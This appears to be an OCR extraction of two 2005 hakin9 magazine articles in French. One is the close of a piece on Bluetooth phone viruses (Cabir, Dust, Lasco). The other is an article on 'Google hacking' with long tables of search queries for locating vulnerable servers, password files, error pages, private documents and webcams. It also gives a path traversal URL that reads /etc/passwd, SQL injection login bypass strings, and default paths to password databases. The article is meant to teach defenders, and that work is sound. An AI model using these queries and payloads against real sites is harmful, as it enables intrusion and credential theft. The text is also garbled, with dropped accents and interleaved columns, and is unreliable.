Comment liminer le virus
Pour neutraliser efficacement le vi-
rus, il suffit de supprimer les fichiers
mentionns ci-dessus. Pour ce faire,
il faut installer ( moins que le sys-
tme d'exploitation du priphrique
ne le permette) un gestionnaire de fi-
chiers et le supprimer manuellement.
Attention : le fichier Caribe.rsc peut
tre difficile supprimer pendant
le fonctionnement du programme
dans ce cas, il faut supprimer tout
ce qu'il est possible, et redmarrer le
priphrique (sans certaines don-
nes, le virus ne sera pas capable
de fonctionner) et supprimer les
autres fichiers.
Une autre faon consiste
exploiter un programme qui
supprimera le virus automatique-
ment. Ce programme peut tre
tlcharg partir du site http://
www.f-secure.com/tools/f-cabir.sis.
Comme vous voyez, cette appli-
cation peut tre aussi envoye et
installe l'aide de Bluetooth.
Dust
Dust est un virus un peu moins
connu. Il infecte les priphriques
tournant sous Windows CE. Ce
hakin9 N o 4/2005
programme malicieux infecte tous
les fichiers .exe qui se trouvent dans
chaque rpertoire principal du pri-
phrique et y ajoute son code. Aprs
le dmarrage et l'excution du code
du virus, ces fichiers fonctionnent
tout fait normalement. Le pro-
gramme n'utilise pas de connexions
rseau pour se propager.
De mme que Cabir, il est ce
qu'on appelle proof of concept, c'est-
-dire le programme crit pour d-
montrer une conception. Cela signifie
que le code contient les mcanismes
limitant la propagation (mais cela ne
dpend que d'une bonne volont du
programmeur) aprs le dmarrage,
le programme demande l'utilisateur
de pouvoir se propager, mais il con-
tamine uniquement les fichiers qui se
trouvent dans le rpertoire principal
du priphrique.
Le code source du virus (en
assembleur pour le processeur
ARM) est disponible l'adresse
http://www.informit.com/articles/prin
terfriendly.asp?p=337071&rl=1.
Lasco
Lasco est un virus fonctionnant sur
les tlphones Nokia. Il agit sur les
modles de la srie 60.
Le principe de son fonction-
nement est analogue de celui de
Cabir il se propage travers le
Bluetooth, en envoyant le fichiers
velasco.sis tous les priphriques naces peut nous apporter cette
dtects dans le voisinage. Bien
qu'aprs son enregistrement dans
le priphrique, le processus d'ins-
tallation du virus soit lanc automa-
tiquement, l'installation se droule
de faon propre tous les program-
mes tlchargs par le Bluetooth
le systme demande la permission
d'installer une application.
www.hakin9.org
Scurit du Bluetooth
Ce qui diffrencie Lasco de Cabir
est la contamination des fichiers .sis
disponibles dans le priphrique. Si
l'on lance un tel fichier, le systme
devient de plus en plus contamin.
Les fichiers infects ne sont pas
diffuss seul le fichier principal du
virus se propage.
Pendant l'installation, le virus
cre les fichiers suivants :
c:\system\apps\velasco\velasco.rsc
c:\system\apps\velasco\velasco.app
c:\system\apps\velasco\flo.mdl
Aprs le lancement du programme,
ils sont copis dans les emplace-
ments suivants :
c:\system\recogs\flo.mdl
c:\system\
symbiansecuredata\
velasco\velasco.app
c:\system\
symbiansecuredata\
velasco\velasco.rsc
Tout cela a lieu probablement pour
rendre plus difficile l'limination du
virus et se protger contre la situa-
tion, quand le programme sera ins-
tall sur la carte mmoire.
Le vaccin qui permet d'liminer
le virus est disponible l'adresse
http://mobile.f-secure.com il faut
s'y connecter l'aide du navigateur
disponible dane le tlphone. Sur la
page, il faut choisir le lien Download
F-Secure Mobile Anti-Virus, et en-
suite tlcharger, installer et dmar-
rer l'application.
Bluetooth en toute
conscience
Le Bluetooth devient de plus en
plus prsent dans notre vie. Il vaut
la peine de savoir quelles me-
technologie et comment elle peut
tre utilise contre nous. Cette
connaissance nous permettra d'uti-
liser les priphriques dots du
Bluetooth avec plus de conscience
et de ne pas croire tout ce que disent
les fabricants ou oprateurs prsen-
tant leurs produits et services. n
21
 Google dangereux la
recherche des informations
confidentielles
Micha Piotrowski

Des informations qui doivent

tre protges sont trs souvent
disponibles au grand public.
Elles sont mises disposition
inconsciemment suite la
ngligence ou l'ignorance
de simples utilisateurs. Le
rsultat est que ces donnes
confidentielles peuvent se
trouver la porte de mains de
tout le monde sur Internet. Il
suffit pour cela d'utiliser Google.

G
oogle rpond environ 80 pourcent
de toutes les questions poses et par Cet article explique...
consquent, c'est le moteur de recher-
che le plus utilis. Cela est d non seulement comment rechercher des informations confiden-
son mcanisme de gnration de rsultats tielles en utilisant Google,
comment trouver des informations sur des sys-
trs efficace mais aussi de grandes possi-
tmes et des services rseaux vulnrables aux
bilits au niveau des questions poses. Il ne
attaques,
faut pas pourtant oublier qu'Internet est un
comment trouver dans Google des priphri-
mdia trs dynamique et que les rsultats de ques rseaux disponibles au grand public.
recherche prsents par Google ne sont pas
toujours d'actualits. Il arrive que certaines pa-
Ce qu'il faut savoir...
ges trouves soient vieilles et que plusieurs pa-
ges ayant un contenu similaire n'aient pas t savoir utiliser un navigateur Web,
visites par Googlebot (script ayant pour but de avoir un savoir-faire de base sur le protocole
rechercher et d'indexer les ressources Web). HTTP.
Les oprateurs de prcision les plus impor-
tants et les plus utiles, y compris leur descrip-
tion et le rsultat de leur fonctionnement, sont
prsents dans le Tableau 1. Les endroits des propos de l'auteur
Focus

Micha Piotrowski a plusieurs annes d'exprience

documents auxquels ils se rfrent lors de
recherche de ressources rseau (sur l'exem-
ple du site de la revue hakin9) sont visibles
sur la Figure 1. Ce ne sont que des exemples
une question mieux construite dans Google
permettra d'obtenir de meilleurs rsultats et en
consquent des informations beaucoup plus
intressantes.
en tant qu'administrateur des rseaux et des syst-
mes d'information. Depuis plus de 3 ans, il travaille
en tant qu'inspecteur de scurit. Il est expert en
matire de scurit des rseaux tlinformatiques
dans l'un des tablissements financiers en Pologne.
Il passe son temps libre programmer et s'occuper
de la cryptographie.

22 www.hakin9.org hakin9 N o 4/2005


Tableau 1. Oprateurs de requtes dans Google
Oprateur Description
site limite les rsultats aux pages se
trouvant dans un domaine dfini
intitle limite les rsultats aux documents
contenant une phrase donne dans
le titre
limite les rsultats aux documents
allintitle contenant toutes les phrases don-
nes dans le titre
inurl limite les rsultats aux pages
contenant une phrase donne dans
l'adresse URL
allinurl limite les rsultats aux pages con-
tenant toutes les phrases donnes
dans l'adresse URL
filetype, ext limite les rsultats un type de
document donne
numrange limite les rsultats aux documents
contenant dans leur texte le nombre
d'une page dfinie
link limite les rsultats aux pages
contenant des liens vers une page
donne
limite les rsultats aux pages avec
inanchor
un lien contenant dans sa descrip-
tion une phrase donne
allintext
limite les rsultats aux documents
contenant dans le texte une phrase
donne sans se soucier du titre, des
liens et des adresses URL
impose une prsence frquente de
+ la phrase donne dans les rsultats
impose la non prsence de la
-
phrase donne dans les rsultats
""
permet de rechercher toutes les
phrases et pas seulement que les
mots
. est remplac par un caractre
unique
* est remplac par un mot unique
OR logique
|
hakin9 N o 4/2005 www.hakin9.org
Google hacking
Exemple d'utilisation
site:google.com fox trouvera toutes les pages conte-
nant le mot fox dans leur texte et se trouvant dans le
domaine *.google.com
intitle:fox fire trouvera les pages contenant le mot
fox dans le titre et fire dans le texte
allintitle:fox fire trouvera toutes les pages contenant
les mots fox et fire dans le titre ; son fonctionnement
est similaire celui de intitle:fox intitle:fire
inurl:fox fire trouvera les pages contenant les mot fire
dans le texte et fox dans l'adresse URL
allinurl:fox fire trouvera les pages contenant les mots
fox et fire dans l'adresse URL ; son fonctionnement est
similaire celui de inurl:fox inurl:fire
retournera les documents PDF
filetype:pdf fire
contenant le mot fire et filetype:xls fox retournera les
documents Excel contenant le mot fox
numrange:1-100 fireretournera les pages comprises
entre 1 et 100 contenant le mot fire. Le mme rsultat
peut tre obtenu en posant la question : 1..100 fire
link:www.google.fr retournera les documents conte-
nant au moins un lien vers la page www.google.fr
inanchor:fire retournera les documents contenant les
liens possdant le mot fire dans sa description (non
dans l'adresse URL vers laquelle ils conduisent mais
dans la partie souligne du texte reprsentant le lien)
allintext:"fire fox" retournerales documents conte-
nant la phrase fire fox seulement dans le texte
+firemet les rsultats en ordre conformment la
frquence de prsence du mot fire.
-fire retournera les documents ne contenant pas le mot
fire.
"fire fox" retournera les documents contenant la
phrase fire fox
fire.fox retournera les documents contenant les phra-
ses fire fox, fireAfox, fire1fox, fire-fox etc.
fire * fox retournera les documents contenant les phra-
ses fire the fox, fire in fox, fire or fox etc.
"fire fox" | firefox retournera les documents contenant
la phrase fire fox ou le mot firefox
23

Figure 1. Utilisation d'oprateurs de recherche sur l'exemple du site de
hakin9
Figure 2. Recherche de serveur IIS 5.0 l'aide de l'oprateur intitle
Chercher une victime
Grce Google, il est possible non
Focus
seulement de trouver des ressour-
ces Internet visant plutt le grand
public mais aussi des ressources
dites confidentielles et donc prives.
Si vous posez une question appro-
prie, il se peut que vous receviez de
surprenants rsultats. Commenons
par quelque chose de simple.
24
Imaginez qu'un trou de scurit
est trouv dans un logiciel commu-
nment utilis. Admettons qu'il
concerne le serveur Microsoft IIS
en version 5.0 et que l'objectif d'un
agresseur potentiel soit de trouver
quelques machines quipes de ce
logiciel afin de les attaquer. Bien sr,
il pourrait utiliser cette fin un scan-
ner mais il prfre choisir Google
www.hakin9.org
il tape alors la question suivante :
"Microsoft-IIS/5.0 Server at" in-
title:index.of. En consquence,
il reoit des liens vers des serveurs
recherchs et plus prcisment aux
contenus lists des rpertoires dis-
ponibles sur ces serveurs. Il est ainsi
vu que dans la configuration stan-
dard, les logiciels IIS (et beaucoup
d'autres) ajoutent certaines pages
gnres dynamiquement des ban-
nires publicitaires contenant leur
nom et le numro de la version (voir
la Figure 2).
C'est un exemple d'information
non dangereuse en elle-mme ;
vu qu'elle est trs souvent ignore
et laisse dans la configuration stan-
dard. Malheureusement, c'est aussi
une information qui dans certains
cas peut devenir trs importante
pour l'agresseur. Pour plus de ques-
tions standard poser dans Google
concernant les autres types de ser-
veurs, reportez-vous au Tableau 2.
Une autre mthode pour trouver
les versions donnes de serveurs
Web consiste rechercher les pages
standard fournies avec les serveurs
et disponibles aprs l'installation.
Cela peut paratre bizarre mais sur le
rseau, il y a plein de serveurs dont
le contenu par dfaut n'a pas t
modifi aprs l'installation. Trs sou-
vent, ce sont des machines oublies
et protges de faon insuffisante
qui s'avre tre une cible facile pour
les intrus. Pour en trouver, il suffit de
poser les questions prsentes dans
le Tableau 3.
Cette mthode est trs simple
et la fois utile. Elle permet d'obtenir
l'accs un grand nombre de diff-
rents services rseaux et systmes
d'exploitation utilisant des applica-
tions o il y a des erreurs qui ont t
dtectes et que les administrateurs
paresseux ou inconscients n'ont pas
supprimes. Prenons comme exem-
ple deux logiciels assez populaires :
WebJeff Filemanager et Advanced
Guestbook.
Le premier d'entre eux est un
gestionnaire de fichiers Web per-
mettant d'envoyer des fichiers sur
des serveurs. De plus, grce ce
logiciel, il est possible de crer,
hakin9 N o 4/2005
 Google hacking

Tableau 2. Google questions concernant les diffrents types de serveurs Web

Question
"Apache/1.3.28 Server at" intitle:index.of
"Apache/2.0 Server at" intitle:index.of
"Apache/* Server at" intitle:index.of
"Microsoft-IIS/4.0 Server at" intitle:index.of
"Microsoft-IIS/5.0 Server at" intitle:index.of
"Microsoft-IIS/6.0 Server at" intitle:index.of
"Microsoft-IIS/* Server at" intitle:index.of
"Oracle HTTP Server/* Server at" intitle:index.of
"IBM _ HTTP _ Server/* * Server at" intitle:index.of
"Netscape/* Server at" intitle:index.of
"Red Hat Secure/*" intitle:index.of
"HP Apache-based Web Server/*" intitle:index.of
Serveur
Apache 1.3.28
Apache 2.0
n'importe quelle version d'Apache
Microsoft Internet Information Services 4.0
Microsoft Internet Information Services 5.0
Microsoft Internet Information Services 6.0
n'importe quelle version de Microsoft Internet Informa-
tion Services
n'importe quelle version de serveur Oracle
n'importe quelle version de serveur IBM
n'importe quelle version de serveur Netscape
n'importe quelle version de serveur Red Hat Secure
n'importe quelle version de serveur HP

Tableau 3. Questions sur les pages standard aprs l'installation des serveurs Web

Question Serveur
intitle:"Test Page for Apache Installation" "You are Apache 1.2.6
free"

intitle:"Test Page for Apache Installation" "It wor- Apache 1.3.01.3.9

ked!" "this Web site!"
intitle:"Test Page for Apache Installation" "Seeing Apache 1.3.111.3.33, 2.0
this instead"
intitle:"Test Page for the SSL/TLS-aware Apache Ins- Apache SSL/TLS
tallation" "Hey, it worked!"
intitle:"Test Page for the Apache Web Server on Red Apache d'un systme Red Hat
Hat Linux"
intitle:"Test Page for the Apache Http Server on Fe- Apache d'un systme Fedora
dora Core"
intitle:"Welcome to Your New Home Page!" Debian Apache d'un systme Debian
intitle:"Welcome to IIS 4.0!" IIS 4.0
intitle:"Welcome to Windows 2000 Internet Services" IIS 5.0
intitle:"Welcome to Windows XP Server Internet Servi- IIS 6.0
ces"

de consulter, de supprimer et
mme de modifier tous fichiers
prsents sur le serveur concern.
Malheureusement, WebJeff Filema-
nager en version 1.6 a une erreur
permettant de lire le contenu de
n'importe quel fichier se trouvant
sur le serveur auquel peut accder
l'utilisateur dmarrant un naviga-
teur Web. Il suffit donc que l'intrus
tape dans le systme vulnrable
l'adresse /index.php3?action=tele-
charger&fichier=/etc/passwd pour
qu'il obtienne le contenu du fichier
/etc/passwd (voir la Figure 3). Bien
sr, pour trouver les serveurs vuln-
rables, l'agresseur utilisera Google
en posant la question : "WebJeff-Fi-
lemanager 1.6" Login.
La deuxime application Ad-
vanced Guestbook est un logiciel
crit en PHP utilisant la base de
donnes SQL permettant d'ajouter
des messages laisss par les visi-
teurs au livre d'or du site visit. En
avril 2004, l'information concernant
un trou de scurit dans la version
2.2 de ce logiciel permettant (grce
la possibilit d'insrer le code SQL
voir l'article Attaques par injection
SQL avec PHP et MySQL dans ha-
kin9 n 3/2005) d'obtenir l'accs au
panneau de configuration. Il suffit
de trouver la page d'ouverture de
session au panneau (voir la Figure 4)
et d'ouvrir la session en laissant le
champ username vide et de taper
dans le champ password ') OR ('a'
= 'a ou l'inverse laisser le champ
password vide et taper ? or 1=1
dans le champ username. Pour
trouver sur le rseau les sites vuln-

hakin9 N o 4/2005 www.hakin9.org 25


Figure 3. Version vulnrable du logiciel WebJeff Filemanager
rables, l'agresseur potentiel peut po-
ser au moteur de recherche Google
l'une des questions suivantes : inti-
tle:Guestbook "Advanced Guestbook
2.2 Powered" ou "Advanced Guestbook
2.2" Username inurl:admin.
Pour prvenir une ventuelle
attaque, l'administrateur doit tre
constamment au courant sur les
ventuelles failles de scurit trou-
ves des logiciels utiliss et appli-
quer le plus rapidement possible les
correctifs de scurit. La seconde
chose qu'il est conseill de faire
est de supprimer les bannires pu-
blicitaires, les noms et les numros
des versions des logiciels de toutes
les pages ou fichiers sensibles d'en
contenir.

Informations sur
les rseaux et les
systmes
Presque chaque attaque contre un
systme informatique est prcde
de son tude. En rgle gnrale,
cela consiste scanner les ordina-
teurs c'est un essai ayant pour but
de dfinir les services en marche, un
type de systme d'exploitation uti-
lis et la version du logiciel utilitaire.
Figure 4. Advanced Guestbook page d'ouverture de session
Pour cela, on utilise le plus souvent
les scanners de type Nmap ou amap
mais il existe encore une option
choisir. Plusieurs administrateurs
installent des applications Web
gnrant sans arrt les statistiques
de travail du systme, informant sur
l'encombrement des disques durs et
contenant les listes des processus
dmarrs et mme les journaux
systme.
Pour un intrus, ce sont des in-
formations trs prcieuses. Il suffit
qu'il demande Google de trouver
les statistiques du logiciel phpSys-
tem : "Generated by phpSystem"
et il obtiendra des pages similaires
Focus

la page prsente sur la Figure 5.

Il peut galement demander d'af-
ficher les pages gnres par le
script Sysinfo : intitle:"Sysinfo *
" intext:"Generated by Sysinfo *
written by The Gamblers." qui con-
tiennent beaucoup plus d'informa-
Figure 5. Statistiques de phpSystem tions sur le systme (Figure 6).

26 www.hakin9.org hakin9 N o 4/2005

 Google hacking

Les possibilits sont ici nombreu- En consquence, l'intrus trouvera

ses (des questions concernant des
statistiques et des informations gn-
res par des logiciels trs populaires
se trouvent dans le Tableau 4). Le fait
d'obtenir des informations de ce type
peut encourager l'intrus raliser une
attaque contre un systme trouv
et peut l'aider choisir les outils ou
les exploits appropris. Donc si vous
utilisez des logiciels permettant de
surveiller les ressources de votre
ordinateur, veillez ce que l'accs
y soit scuris et qu'il exige un mot
de passe.
la recherche des
erreurs
Les messages d'erreur HTTP peu-
vent tre trs prcieux pour l'intrus
c'est grce ces informations
que l'on peut obtenir beaucoup de
prcisions sur le systme, sa con-
figuration et la structure de ses ba-
ses de donnes. titre d'exemple,
pour trouver des erreurs gnres
par la base Informix, il suffit de
poser au moteur de recherche la
question suivante : "A syntax er-
ror has occurred" filetype:ihtml.
les messages contenant des infor-
mations sur la configuration de la
base de donnes, la rpartition des
fichiers dans le systme et parfois
les mots de passe (voir la Figure 7).
Pour limiter les rsultats seulement
aux pages contenant les mots de
passe, il suffit de modifier un peu
la question pose : "A syntax er-
ror has occurred" filetype:ihtml
intext:LOGIN .
Des informations aussi int-
ressantes peuvent tre obtenues
partir des erreurs de la base de

Tableau 4. Logiciels gnrant des statistiques de travail du systme

Question Type d'informations

"Generated by phpSystem"
"This summary was generated by wwwstat"
"These statistics were produced by getstats"
"This report was generated by WebLog"
intext:"Tobias Oetiker" "traffic analysis"
intitle:"Apache::Status" (inurl:server-sta-
tus | inurl:status.html | inurl:apache.html)
intitle:"ASP Stats Generator *.*" "ASP Stats
Generator" "2003-2004 weppos"
intitle:"Multimon UPS status page"
intitle:"statistics of" "advanced web sta-
tistics"
intitle:"System Statistics" +"System and
Network Information Center"
intitle:"Usage Statistics for" "Generated by
Webalizer"
intitle:"Web Server Statistics for ****"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:server-info "Apache Server Informa-
tion"
"Output produced by SysWatch *"
le type et la version du systme d'exploitation, la configuration ma-
trielle, les utilisateurs logus, les connexions ouvertes, l'encombre-
ment de la mmoire et des disques durs, les points de montage
les statistiques de travail du serveur Web, la rpartition des
fichiers dans le systme
les statistiques de travail du serveur Web, la rpartition des
fichiers dans le systme
les statistiques de travail du serveur Web, la rpartition des
fichiers dans le systme
les statistiques de travail du systme sous forme de diagrammes
MRTG, la configuration du rseau
la version du serveur, le type du systme d'exploitation, la liste
des processus fils et les connexions actuelles
l'activit du serveur Web, beaucoup d'informations sur les visiteurs
les statistiques de travail des priphriques UPS
les statistiques de travail du serveur Web, les informations sur les
visiteurs
les statistiques de travail du systme sous la forme des diagram-
mes MRTG, la configuration matrielle, les services en marche
les statistiques de travail du serveur Web, les informations sur les
visiteurs, la rpartition des fichiers dans le systme
les statistiques de travail du serveur Web, les informations sur les
visiteurs
les statistiques de travail du serveur Web, les informations sur les
visiteurs
les diagrammes MRTG concernant le travail des interfaces rseau
la version et la configuration du serveur Web, le type du systme
d'exploitation, la rpartition des fichiers dans le systme
le type et la version du systme d'exploitation, les utilisateurs
logus, l'encombrement de la mmoire et des disques durs, les
points de montage, les processus dmarrs, les journaux systme

hakin9 N o 4/2005 www.hakin9.org 27


Figure 6. Statistiques de Sysinfo
donnes MySQL. Cela se voit sur
l'exemple de la question "Access
denied for user" "Using password"
la Figure 8 reprsente l'une des
pages trouves l'aide de cette
mthode. Pour consulter les autres
exemples de questions utilisant des
erreurs de ce type, reportez-vous
au Tableau 5.
La seule mthode pour protger
vos systmes contre l'information
publique sur les erreurs consiste
avant tout modifier rapidement
les configurations standards et si
cela est possible, configurer les
logiciels de sorte que les messages
d'erreur soient enregistres dans les
fichiers destins cette fin et non
les envoyer vers les pages disponi-
bles aux utilisateurs.
N'oubliez pas que mme si vous
supprimez les erreurs (et que les pa-
ges affiches par Google ne seront
plus d'actualits par la suite), l'intrus
peut voir toujours la copie de la page
stocke par le cache du moteur de
recherche Google. Il suffit qu'il cli-
que sur le lien donn par la liste de
rsultats pour tre conduit vers la
copie du site. Heureusement, pre-
nant en compte une grande quantit
de ressources Web, les copies sont
stockes dans le cache durant un
temps restreint.

Chercher les mots

Figure 7. Utilisation d'erreurs de la base de donnes Informix de passe
Sur le rseau, on peut trouver
une multitude de mots de passe
destine des ressources de tous
types des comptes courrier, des
serveurs FTP ou mme des comp-
tes shell. Cela est d notamment au
manque de savoir-faire des utilisa-
teurs qui mettent inconsciemment
leur mots de passe dans des en-
droits accessibles au grand public
et la ngligence d'diteurs de
logiciels qui, d'une part protgent
Focus

les donnes utilisateur de faon

inapproprie, et, d'autre part, ne les
informent pas sur la ncessit de
modifier la configuration standard
de leurs produits.
Prenons comme exemple
WS_FTP, client FTP connu et utilis
Figure 8. Erreur de la base MySQL frquemment qui tout comme la plu-

28 www.hakin9.org hakin9 N o 4/2005

 Google hacking

part des logiciels utilitaires permet

de mmoriser les mots de passe
des comptes. WS_FTP enregistre
sa configuration et les informations
sur les comptes utilisateur dans le
fichier WS_FTP.ini. Malheureuse-
ment, tout le monde ne se rend pas
compte du fait que chaque personne
qui aura l'accs la configuration du
client FTP pourra accder en mme
temps nos ressources. Il est vrai
que les mots de passe stocks dans
le fichier WS_FTP.ini sont crypts
mais malgr tout, cela ne reste pas
suffisant possdant le fichier de
configuration, l'intrus pourra utiliser
les outils permettant de dchiffrer
les mots de passe ou d'installer tout
simplement le logiciel WS_FTP et de
le dmarrer dans votre configuration.
Mais comment peut-il accder aux
milliers de fichiers de configuration
du client WS_FTP ? En utilisant
Google bien videmment. En po-
sant les questions "Index of/" "Pa-
rent Directory" "WS _ FTP.ini" ou
filetype:ini WS _ FTP PWD , il obtiendra Figure 9. Fichier de configuration du logiciel WS_FTP

Tableau 5. Messages d'erreur

Question
"A syntax error has occur-
red" filetype:ihtml
"Access denied for user"
"Using password"
"The script whose uid is "
"is not allowed to access"
"ORA-00921: unexpected end of
SQL command"
"error found handling the
request" cocoon filetype:xml
"Invision Power Board Data-
base Error"
"Warning: mysql _ query()"
"invalid query"
"Error Message : Error loa-
ding required libraries."
"#mysql dump" filetype:sql
Rsultat
les messages d'erreur de la base Informix ils peuvent contenir les noms des
fonctions ou de fichiers, des informations sur la rpartition des fichiers, des frag-
ments du code SQL et des mots de passe
les erreurs d'authentification ils peuvent contenir des noms d'utilisateur, des
noms des fonctions, des informations sur la rpartition de fichiers et de fragments
de code SQL
les messages d'erreur PHP lis au contrle d'accs ils peuvent contenir des noms
de fichiers ou de fonctions et des informations sur la rpartition des fichiers
les messages d'erreur de la base Oracle ils peuvent contenir des noms de
fichiers ou de fonctions et des informations sur la rpartition des fichiers
les messages d'erreur du logiciel Cocoon ils peuvent contenir le numro de la
version Cocoon, des noms de fichiers ou de fonctions et des informations sur la
rpartition des fichiers
les messages d'erreur du forum de discussion Invision Power Board ils peuvent
contenir des noms de fonctions et de fichiers, des informations sur la rpartition
de fichiers dans le systme et des fragments du code SQL
les messages d'erreur de la base MySQL ils peuvent contenir des noms d'uti-
lisateur, des noms de fonctions des fichiers et des informations sur la rpartition
des fichiers
les messages d'erreur des scripts CGI ils peuvent contenir des informations sur le
type du systme d'exploitation et la version du logiciel, des noms d'utilisateur, des
noms de fichiers et des informations sur la rpartition de fichiers dans le systme
les messages d'erreur de la base MySQL ils peuvent contenir des informations
sur la structure et le contenu de la base de donnes

hakin9 N o 4/2005 www.hakin9.org 29

 plusieurs liens vers les donnes qui
l'intressent (Figure 9).
L'application Web nomme DU-
classified permettant d'ajouter et de
grer les publicits dans les services
Internet est un autre exemple. Dans
la configuration standard, les noms
d'utilisateur, les mots de passe
et les autres donnes sont stocks
dans le fichier duclassified.mdb
situ dans un sous-rpertoire
_private non scuris contre la
lecture. Il suffit alors de trouver
un service utilisant DUclassifield
avec une adresse http://<host>/

Tableau 6. Mots de passe exemples de questions dans Google

Question Rsultat

"http://*:*@www" site
filetype:bak inurl:"htaccess|passwd|shadow|
htusers"
filetype:mdb inurl:"account|users|admin|admi
nistrators|passwd|password"
intitle:"Index of" pwd.db
inurl:admin inurl:backup intitle:index.of
"Index of/" "Parent Directory" "WS _
FTP.ini" filetype:ini WS _ FTP PWD
ext:pwd inurl:(service|authors|administrato
rs|users) "# -FrontPage-"
filetype:sql ("passwd values ****" | "pas-
sword values ****" | "pass values ****" )
intitle:index.of trillian.ini
eggdrop filetype:user user
filetype:conf slapd.conf
inurl:"wvdial.conf" intext:"password"
ext:ini eudora.ini
filetype:mdb inurl:users.mdb
intext:"powered by Web Wiz Journal"
"Powered by DUclassified" -site:duware.com
"Powered by DUcalendar" -site:duware.com
"Powered by DUdirectory" -site:duware.com
"Powered by DUclassmate" -site:duware.com
"Powered by DUdownload" -site:duware.com
"Powered by DUpaypal" -site:duware.com
Focus
les mots de passe pour la page site enregistrs comme
http://username:password@www...
les copies de sauvegarde de fichiers pouvant contenir des informa-
tions sur des noms d'utilisateurs et des mots de passe
les fichiers de type mdb qui peuvent contenir des informations sur
les mots de passe
les fichiers pwd.db peuvent contenir des noms d'utilisateurs et des
mots de passe crypts
les rpertoires nomms admin et backup
les fichiers de configuration du logiciel WS_FTP pouvant contenir
des mots de passe pour des serveurs FTP
des fichiers contenant des mots de passe du logiciel Microsoft
FrontPage
des fichiers contenant des codes SQL et des mots de passe ajou-
ts la base de donnes
des fichiers de configuration du logiciel de messagerie instantane
Trillian
des fichiers de configuration de lircbot Eggdrop
des fichiers de configuration de l'application OpenLDAP
des fichiers de configuration du logiciel WV Dial
des fichiers de configuration du logiciel de messagerie lectronique
Eudora
des fichiers Microsoft Access pouvant contenir des informations sur
des comptes
des services Web utilisant l'application Web Wiz Journal permettant
dans la configuration standard de tlcharger un fichier contenant
les mots de passe ; au lieu de l'adresse par dfaut http://<host>/
journal/, il faut taper http://<host>/journal/journal.mdb
des services Web utilisant les applications DUclassified, DUcalen-
dar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum
ou DUpics qui, dans la configuration standard, permettent de tl-
charger un fichier contenant les mots de passe ; au lieu de l'adres-
se par dfaut (pour DUclassified) http://<host>/duClassified/, il faut
taper http://<host>/duClassified/_private/duclassified.mdb

"Powered by DUforum" -site:duware.com

intitle:dupics inurl:(add.asp | default.asp
| view.asp | voting.asp) -site:duware.com
intext:"BiTBOARD v2.0" "BiTSHiFTERS Bulle-
tin Board"
des services Web utilisant l'application Bitboard2 permettant, dans
la configuration standard, de tlcharger un fichier contenant les
mots de passe ; au lieu de l'adresse par dfaut http://<host>/forum/
forum.php, il faut taper http://<host>/forum/admin/data_passwd.dat

30 www.hakin9.org hakin9 N o 4/2005

 Google hacking

duClassified/ et de la remplacer par

http://<host>/duClassified/_private/
duclassified.mdb pour obtenir un
fichier avec les mots de passe et,
par consquent, un accs illimit
l'application (voir la Figure 10).
Pour trouver les sites utilisant l'ap-
plication dcrite, essayez de taper
la question suivante dans Google :
"Powered by DUclassified" -site:
duware.com (pour viter les rsultats
concernant le site de l'diteur). Ce
qui est intressant c'est que l'diteur
DUclassified la socit DUware
a cr d'autres applications vuln-
rables ce type d'oprations.
En thorie, tout le monde sait
qu'il ne faut pas coller les mots
de passe sur le moniteur ou les
cacher sous le clavier. Cependant,
beaucoup d'utilisateurs enregistrent
leurs mots de passe dans des fi-
chiers l'intrieur de leurs dossiers
personnels tant eux-mmes, con-
trairement aux attentes, disponibles
depuis Internet. En outre, beaucoup
Figure 10. Logiciel DUclassified dans la configuration standard
d'entre sont des administrateurs r-
seaux et c'est pourquoi, ces fichiers
sont d'une importance capitale.
Difficile de trouver une rgle pour
rechercher ce type de donnes
mais les combinaisons de mots
du type : account, users, admin,
administrators, passwd, password
etc. peuvent apporter de bons r-
sultats notamment pour les types
de fichiers suivant :.xls, .txt, .doc,
.mdb et .pdf. Il est galement con-
seill de s'intresser aux rpertoi-
res nomms avec les mots admin,
backup ou d'autres mots similaires :
inurl:admin intitle:index.of. Pour
voir des questions concernant les
mots de passe, reportez-vous au
Tableau 6.
Pour rendre aux intrus l'accs
vos mots de passe plus difficile,
vous devez tout d'abord penser o
Figure 11. Carnet d'adresses lectronique obtenu grce Google et pourquoi vous les tapez, com-
ment ils sont stocks et comment ils
sont utiliss. Si vous surveillez un
Sur Internet service Internet, vous devez analy-
http://johnny.ihackstuff.com larchive d'informations sur Google hacking la plus ser la configuration des applications
importante, utilises, trouver les donnes expo-
http://insecure.org/nmap/ le scanner rseau Nmap, ses au danger ou mal protges
http://thc.org/thc-amap/ le scanner amap. et les scuriser de faon appro-
prie.

hakin9 N o 4/2005 www.hakin9.org 31

 Tableau 7. Recherche des donnes personnelles et des documents confidentiels

Question Rsultat
filetype:xls inurl:"email.xls" des fichiers email.xls pouvant contenir des adresses

"phone * * *" "address *" "e-mail" intitle:"cur- des documents CV

riculum vitae"
"not for distribution" confidential
buddylist.blt
intitle:index.of mystuff.xml
filetype:ctt "msn"
filetype:QDF QDF
intitle:index.of finances.xls
intitle:"Index Of" -inurl:maillog maillog size
"Network Vulnerability Assessment Report"
"Host Vulnerability Summary Report"
filetype:pdf "Assessment Report"
"This file was generated by Nessus"
des documents avec la clause confidential
des listes de contacts du logiciel de messagerie instantane
AIM
des listes de contacts du logiciel de messagerie instantane
Trillian
des listes de contacts MSN
la base de donnes du logiciel financier Quicken
des fichiers finances.xls pouvant contenir des informations
sur des comptes bancaires, des rapports financiers et des
numros de cartes de crdit
des fichiers maillog pouvant contenir des messages e-mail
des rapports sur l'tude de la scurit des rseaux, des tests
de pntration, etc.

Tableau 8. Squences caractristiques pour les priphriques rseaux

Question Priphrique
"Copyright (c) Tektronix, Inc." "printer status" les imprimantes PhaserLink
inurl:"printer/main.html" intext:"settings" les imprimantes Brother HL
intitle:"Dell Laser Printer" ews les imprimantes Della bases sur la technologie EWS
intext:centreware inurl:status les imprimantes Xerox Phaser 4500/6250/8200/8400
inurl:hp/device/this.LCDispatcher les imprimantes HP
intitle:liveapplet inurl:LvAppl les camras Canon Webview
intitle:"EvoCam" inurl:"webcam.html" les camras Evocam
inurl:"ViewerFrame?Mode=" les camras Panasonic Network Camera
(intext:"MOBOTIX M1" | intext:"MOBOTIX M10") intext: les camras Mobotix
"Open Menu" Shift-Reload

inurl:indexFrame.shtml Axis les camras Axis

SNC-RZ30 HOME
intitle:"my webcamXP server!" inurl:":8080"
allintitle:Brains, Corp. camera
intitle:"active webcam page"
les camras Sony SNC-RZ30
